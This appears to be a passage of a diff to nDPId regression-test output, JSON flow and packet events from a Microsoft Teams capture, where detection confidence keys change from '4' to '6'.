00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1587041676642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676642,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5PAqAEGKH4JBex2AbukS07qokMa3IAQEAn5EwAAAQEICjCEmIFVAL3h"} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676612,"flow_last_seen":1587041676643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041676643,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676612,"flow_last_seen":1587041676643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041676643,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041676612,"flow_last_seen":1587041676675,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1686,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041676675,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677042,"flow_last_seen":1587041677042,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041677042,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1587041677042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041677042,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex3AbvbPWM6AAAAALAC\/\/\/8iwAAAgQFtAEDAwUBAQgKMISaAAAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1587041677088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041677088,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8FwhAAGwGtHI0ck0hwKgBBgG77Hf6fNLR2z1jO6ASIACfvwAAAgQFoAEDAwgEAggKYRMfbzCEmgA="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1587041677088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041677088,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex3AbvbPWM7+nzS0oAQEAneQwAAAQEICjCEmixhEx9v"} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677042,"flow_last_seen":1587041677088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041677088,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01501{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":167,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041677042,"flow_last_seen":1587041677186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5981,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041677186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 
+00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677042,"flow_last_seen":1587041677088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041677088,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01501{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":167,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041677042,"flow_last_seen":1587041677186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5981,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041677186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677243,"flow_last_seen":1587041677243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041677243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1587041677243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041677243,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx4Abt\/TkvVAAAAALAC\/\/\/5uQAAAgQFtAEDAwUBAQgKMISawwAAAAAEAgAA"} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1587041677255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041677255,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0wUlAAHUGi9Y0ccKEwKgBBgG77Hiki1UTf05L1oAS\/\/8DeQAAAgQFoAEDAwgBAQQC"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1587041677255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677255,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx4Abt\/TkvWpItVFFAQIAAkOAAA"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677243,"flow_last_seen":1587041677255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041677255,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-01172{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041677243,"flow_last_seen":1587041677269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6239,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041677269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677243,"flow_last_seen":1587041677255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041677255,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01172{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041677243,"flow_last_seen":1587041677269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6239,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041677269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1587041677380,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677380,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGPCzAqAEGlZqnW+SlAbsZTPC8DAoX91AUECaMmwAA"} 00184{"error_event_id":5,"error_event_name":"Unknown packet 
type","datalink":1,"packet_id":607,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041677408} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":607,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041677401,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
@@ -64,279 +65,284 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1587041678029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041678029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex5Abv0H+uOAAAAALAC\/\/9XkAAAAgQFtAEDAwUBAQgKMISdwwAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1587041678074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041678074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8KlZAAGwGoSQ0ck0hwKgBBgG77Hk7ZXhQ9B\/rj6ASIAAz8QAAAgQFoAEDAwgEAggKYRL\/2zCEncM="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1587041678074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041678074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex5Abv0H+uPO2V4UYAQEAlydQAAAQEICjCEne9hEv\/b"} 
-00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041678029,"flow_last_seen":1587041678074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041678074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":625,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041678029,"flow_last_seen":1587041678120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041678120,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041678029,"flow_last_seen":1587041678074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041678074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":625,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041678029,"flow_last_seen":1587041678120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041678120,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":644,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041678611} 
00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":644,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041678303,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1587041679059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041679059,"pkt":"EBMx8Tl2KDc3AG3ICABFAABFmxQAAP8RnTvAqAEGwKgBAfouADUAMTs\/p0sBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
